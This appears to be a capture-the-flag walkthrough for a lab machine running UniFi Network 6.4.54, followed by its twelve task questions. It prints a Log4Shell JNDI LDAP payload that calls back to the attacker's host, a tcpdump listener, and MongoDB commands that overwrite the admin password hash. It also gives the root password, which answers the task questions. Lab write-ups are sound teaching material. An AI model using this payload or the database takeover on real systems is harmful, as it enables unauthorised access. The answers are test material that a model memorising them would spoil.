$ unified.pwn()
UniFi Network 6.4.54 on port 8443 is vulnerable to Log4Shell (CVE-2021-44228). A JNDI LDAP payload in the remember field triggers an outbound LDAP callback. We intercept via tcpdump on port 389, then enumerate MongoDB (port 27117) to update the admin password hash and log in, finally reading the root credentials.
Techniques
Open Ports
Terminal Session
# Scan — 4 open ports
nmap -sVC 10.129.x.x
# 22/tcp ssh
# 6789/tcp http
# 8080/tcp http-proxy
# 8443/tcp UniFi Network 6.4.54
# Log4Shell payload in POST /api/login:
# "remember": "${jndi:ldap://10.10.14.x:389/o=tomcat}"
# Start tcpdump listener on port 389
tcpdump -i tun0 port 389
# Verify LDAP callback received from target
# MongoDB enumeration (port 27117)
mongo --port 27117
use ace
db.admin.find()
# Returns admin user with password hash
# Update admin password hash to known bcrypt hash
db.admin.update(
{"name": "administrator"},
{$set: {"x_shadow": "<new-bcrypt-hash>"}}
)
# Login to UniFi as administrator
# Read root SSH credentials from Settings → Site
# SSH password: NotAcrackablePassword4U2022
[✓] Root access obtained — flags captured!Tasks (12)
Which are the first four open ports?
What is the title of the software that is running on port 8443?
What is the version of the software that is running?
What is the CVE for the identified vulnerability?
What protocol does JNDI leverage in the injection?
What tool do we use to intercept the traffic, indicating the attack was successful?
What port do we need to inspect intercepted traffic for?
What port is the MongoDB service running on?
What is the default database name for UniFi applications?
What is the function we use to enumerate users within the database in MongoDB?
What is the function we use to update users within the database in MongoDB?
What is the password for the root user?